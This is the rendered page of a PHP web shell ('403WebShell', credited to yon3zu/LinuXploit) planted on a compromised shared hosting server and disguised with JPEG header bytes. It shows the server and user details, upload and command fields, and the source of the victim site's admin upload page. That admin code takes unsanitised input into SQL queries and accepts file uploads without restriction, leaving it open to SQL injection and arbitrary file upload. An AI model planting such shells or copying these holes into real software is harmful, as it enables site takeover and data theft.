ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/taxhyuvu/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/taxhyuvu/public_html/admin/addcir.php
<?php $id=$_GET['id'];
// echo"$id";
include "db.php";
?>
<?php
Session_start();
 if(isset($_SESSION['adminlogedin']) && $_SESSION['adminlogedin']==true) { 
    
    $email= $_SESSION['Email_Address03092372779'];
    $user= $_SESSION['user03092372779'];

    

?>

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Upload <?php echo"$id Circular";?></title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
</head>
<body style="background: #21a3b321;">
<Style>
    .form-control:focus {
    color: #212529;
    background-color: #fff;
    border-color: #b7d0f5;
    outline: 0;
    box-shadow: 0 0 0 0.25rem rgba(79, 80, 80, 0.247);
}

 .btn-primary{    background: #009bad;
    border: #0a9eb0;}
    .btn:hover {
    color: var(--bs-btn-hover-color);
    background-color: #98a0a4;
    border-color: #98a0a4;
}
    .head{width: 100%;height: ; 
    background-color: #f7f7f7;}
    .head img{width: 300px;}
.img1st{margin: 0% ;
        padding: 20px}
td{text-align: justify;
    }
    th{text-align: center;    color: #666666;
    }
*{font-family: Math !important;}
p{font-size: 18px;}
</Style>
<div class=head>
    <div class="container" >
<div class="img1st">
<center>
<img src="Logo.png"></center>
</div>
</div>
</div>

<h1 style="  text-transform: capitalize;text-align:center; font-weight:800;
    padding: 20px;     margin-top: 10px;">Upload <?php echo $id;?> Circular</h1>
<div class="container" style="max-width: 1155px; box-shadow: 5px 5px 5px 5px #888888;background: #f7f7f7;border: 3px solid #a0a0a0; padding: 20px;">
<form  method="post" enctype="multipart/form-data" style="border: 1px solid;padding: 14px;border-color: #ececec;border-radius: 9px;background: #ececec;">
<input type="date" name="datess"  class="form-control mt-3" placeholder="Enter Date Here" style=" height: 40px;   font-size: 18px;"/>
<input type="text" name="cir" placeholder="Enter Circular No" class="form-control mt-3" style=" height: 40px;font-size: 18px;">
<input type="text" name="top" placeholder="Topic" class="form-control mt-3" style=" height: 40px;font-size: 18px;">
<input type="text" name="sub" placeholder="Subject" class="form-control mt-3" style=" height: 40px;font-size: 18px;">



<input type="file" name="pdf" placeholder="Enter Subject" class="form-control mt-3" style=" height: 40px;   font-size: 18px;">
<?php echo "<input type='hidden' name='date'  value='" . date('d-M-Y') . "' required/>";?>
<button class="btn btn-danger mt-3" type="submit" name="ordgo"style="width:100%;     background: #04a3b4;
    border: 1px solid;
    font-weight: 900;height: 40px;
    font-size: 20px;
    border-color: #04a3b4;" >Upload Circular</button>
</form></div>
<?php
$powername=$_SESSION['fname'];
 
if(isset($_POST['ordgo'])){
    // $dates =$_POST['datess'];  
    $cir=$_POST['cir'];
    $top=$_POST['top'];
    $sub=$_POST['sub'];
    $cirdate =$_POST['datess'];  
    // $newDate = date("d-m-Y", strtotime($dates));

    $date=$_POST['date'];
        $location= "circular/";
        $pdf = $_FILES['pdf']['name'];
      $pdf_tmp6 = $_FILES['pdf']['tmp_name'];
      move_uploaded_file($pdf_tmp6, $location.$pdf);
      $fdp="SELECT * FROM `cir` WHERE `PDF` ='$pdf'";   
    $pdfrun=mysqli_query($con,$fdp);
    $countp=mysqli_num_rows($pdfrun);
   if ($countp == "1") {
    echo '<script>
  alert("Kindly Change Your File Name");
  </script>';
   }else{
    $heross="INSERT INTO `cir`(`cir`, `top`, `sub`, `cirdate`, `PDF`, `Catag`, `dated`, `upby`, `eemail`) VALUES 
    ('$cir','$top','$sub','$cirdate','$pdf','$id','$date','$powername','$email')";
    $datass=mysqli_query($con,$heross);
   }
    
    if( $datass== 1){

   
  
        echo '<script>
        alert("Your File Has Been Uploaded!");
        </script>';
        
        if($id == "Income tax"){header('location:circulars.php?tax=Income%20tax');}
        elseif($id =="Sales tax"){header('location:circulars.php?tax=Sales%20tax');}
        elseif($id =="Federal Excise"){header('location:circulars.php?tax=Federal%20Excise');}
        elseif($id =="Customs"){header('location:circulars.php?tax=Customs');}
        else{header('location:index');}


    }
}

?>


<?php } 
else{ echo '<script>window.open("login", "_self")</script>'; } ?>

Youez - 2016 - github.com/yon3zu
LinuXploit